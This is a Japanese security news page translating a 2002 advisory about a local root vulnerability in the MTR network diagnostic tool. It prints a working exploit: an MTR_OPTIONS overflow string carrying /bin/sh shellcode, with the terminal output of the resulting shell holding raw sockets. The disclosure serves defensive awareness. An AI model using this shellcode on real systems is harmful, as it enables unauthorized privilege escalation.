MTR は、ローカルユーザがルート権限を取得するのを許す | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2018.10.20(土)

MTR は、ローカルユーザがルート権限を取得するのを許す

[翻訳:関谷 麻美] 2002年3月9日

国際 海外情報
[翻訳:関谷 麻美]
2002年3月9日

概要:
 MTR は、'ping' と'traceroute' を結合して一つのプログラムにしたネットワーク診断ツールだ。その製品のセキュリティ上の脆弱性は、任意コードを実行し、そして高い権限の取得を許可する。MTR の作者が、setuid root で実行されるプログラムを推奨していないことに注目する必要がある。

詳細:
攻略コード
 サンプルの攻略手段は、脆弱なコードにある strtok/while ループなので平凡なコードだ。

$ uname -smr
Linux 2.4.8-26mdk i686
$ setenv MTR_OPTIONS `perl -e 'print "A "x130 . "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08
x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"'`
$ ./mtr
sh-2.05$

この時点で、exec'd shell は開いている生のソケットを持つ。

$ /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x――― 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx――― 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx――― 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx――― 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx――― 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
lrwx――― 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
lr-x――― 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd

追加情報:
 Przemyslaw Frasunek がこの情報を提供した。

[情報提供:SecuriTeam]
http://www.securiteam.com/

《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

(。・ω・)ゞ !!ScanNetSecurity創刊20周年特別キャンペーン実施中。会員限定 PREMIUM 記事読み放題。早割10月末迄。現在通常料金半額以下!!
<b>(。・ω・)ゞ !!ScanNetSecurity創刊20周年特別キャンペーン実施中。会員限定 PREMIUM 記事読み放題。早割<font color=10月末迄。現在通常料金半額以下!!">

サイバーセキュリティの専門誌 ScanNetSecurity は 1998年の創刊から20周年を迎え、感謝を込めた特別キャンペーンを実施中。創刊以来史上最大割引率。次は30周年が来るまでこの価格はもうありません

×